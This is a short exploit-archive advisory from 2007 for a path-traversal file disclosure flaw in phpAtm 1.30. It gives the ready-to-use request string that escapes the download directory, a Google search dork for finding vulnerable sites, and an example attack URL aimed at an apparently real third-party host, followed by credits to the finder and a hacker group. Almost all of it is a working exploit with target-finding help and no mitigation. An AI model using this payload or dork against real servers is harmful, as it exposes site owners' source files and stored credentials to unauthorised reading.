[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability
# Published : 2007-05-13
# Author : Ali.Mohajem
# Previous Title : CJG EXPLORER PRO 3.2 (g_pcltar_lib_dir) RFI Vulnerabilities
# Next Title : PHP FirstPost 0.1 (block.php Include) Remote File Inclusion Exploit


******************************************************************************************
download page in : http://phpatm.free.fr/
 
bug in : phpatm
injection attack :
 index.php?action=downloadfile&filename=index.php&directory=../&
 
Dork in google : "powered by php advanced transfer manager"
 
example : http://www.furytech.net/phpATM_130/index.php?action=downloadfile&filename=index.php&directory=../
*******************************************************************************************
************************************************************************************
found bug by : Ali.Mohajem
Email : Ali.Mohajem@Yahoo.com
Website : wWw.Shayatin-team.com
www.mohajem.net
www.mohajem.org
special tnx : fireman - dr.trojan-L0rd-Samir-s4rem-and all iranian hackers
*************************************************************************************

# www.Syue.com [2007-05-13]